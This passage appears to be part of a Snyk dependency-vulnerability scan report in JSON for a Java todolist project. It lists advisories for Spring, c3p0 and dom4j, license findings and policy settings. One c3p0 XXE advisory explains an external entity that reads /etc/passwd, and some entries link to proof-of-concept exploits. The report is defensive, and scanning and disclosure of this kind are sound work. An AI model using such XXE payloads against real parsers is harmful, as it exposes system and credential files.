Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", + "epssDetails": { + "percentile": "0.99975", + "probability": "0.97485", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22965" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-03-30T21:42:31.436000Z", + "functions_new": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "className": "org.springframework.beans.CachedIntrospectionResults", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-30T21:42:24Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-03-30T22:32:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:17.474380Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Rob Ryan" + ], + "semver": { + "vulnerable": [ + "[,5.2.22.RELEASE)", + "[5.3.0,5.3.20)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.22.RELEASE", + "5.3.20" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", + "title": "GitHub Commit" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22970", + "title": "Tanzu vmware" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:21.626910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", + "epssDetails": { + "percentile": "0.75300", + "probability": "0.00449", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22970" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-05-12T08:45:35.744127Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-05-12T08:17:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-05-12T09:49:10.833602Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:48.407397Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "title": "Improper Handling of Case Sensitivity", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.2.21)", + "[5.3.0, 5.3.19)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "5.2.21", + "5.3.19" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 3.7, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-context", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28333", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/MarcinGadz/spring-rce-poc", + "title": "PoC" + }, + { + "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", + "title": "Spring Blog Post" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22968", + "title": "Tanzu Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.233852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", + "epssDetails": { + "percentile": "0.29205", + "probability": "0.00065", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22968" + ], + "CWE": [ + "CWE-178" + ] + }, + "packageName": "org.springframework:spring-context", + "proprietary": false, + "creationTime": "2022-04-14T11:54:10.207823Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-04-14T11:43:54Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-context" + }, + "publicationTime": "2022-04-14T12:09:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:16.458425Z", + "socialTrendAlert": false, + "severityWithCritical": "low", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-context", + "version": "3.2.6.RELEASE" + }, + { + "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.5.4,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.aspectj:aspectjweaver", + "creationTime": "2024-06-18T21:24:04.112Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T21:24:04.112Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.aspectj:aspectjweaver@1.8.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.aspectj:aspectjweaver", + "version": "1.8.2" + }, + { + "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[4.0.0.CR1,)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.hibernate.common:hibernate-commons-annotations", + "creationTime": "2024-06-18T11:03:46.980Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:03:46.980Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate.common:hibernate-commons-annotations", + "version": "4.0.5.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.0.0.Final,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "creationTime": "2024-06-18T12:03:42.953Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T12:03:42.953Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "version": "1.0.0.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.5.0.Beta-1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-entitymanager", + "creationTime": "2024-06-18T11:52:01.913Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:52:01.913Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-entitymanager@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-entitymanager", + "version": "4.3.7.Final" + }, + { + "id": "snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[3.0.1.GA, 3.1.2.GA)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.jboss.logging:jboss-logging", + "creationTime": "2024-06-18T02:47:02.411Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:47:02.411Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final", + "org.jboss.logging:jboss-logging@3.1.0.CR2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.jboss.logging:jboss-logging", + "version": "3.1.0.CR2" + } + ], + "ok": false, + "dependencyCount": 42, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "99 vulnerable dependency paths", + "remediation": { + "unresolved": [ + { + "id": "SNYK-JAVA-C3P0-461017", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:45.369849Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", + "epssDetails": { + "percentile": "0.78365", + "probability": "0.00585", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-20433" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:17:58.383761Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-12-24T13:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-07-21T14:22:18Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:09.230623Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "critical" + }, + { + "id": "SNYK-JAVA-C3P0-461018", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://hackerone.com/reports/509315", + "title": "POC: Hackerone Report" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:14.895852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", + "epssDetails": { + "percentile": "0.90102", + "probability": "0.02457", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-5427" + ], + "CWE": [ + "CWE-776" + ], + "GHSA": [ + "GHSA-84p2-vf58-xhxv" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:24:58.914446Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-04-22T22:18:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-04-22T22:18:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:53.496388Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "type": "license", + "title": "LGPL-3.0 license", + "semver": { + "vulnerable": [ + "[0,)" + ] + }, + "license": "LGPL-3.0", + "language": "java", + "description": "LGPL-3.0 license", + "packageName": "c3p0:c3p0", + "creationTime": "2024-06-18T02:35:42.971Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:35:42.971Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-DOM4J-174153", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "credit": [ + "Mario Areias" + ], + "semver": { + 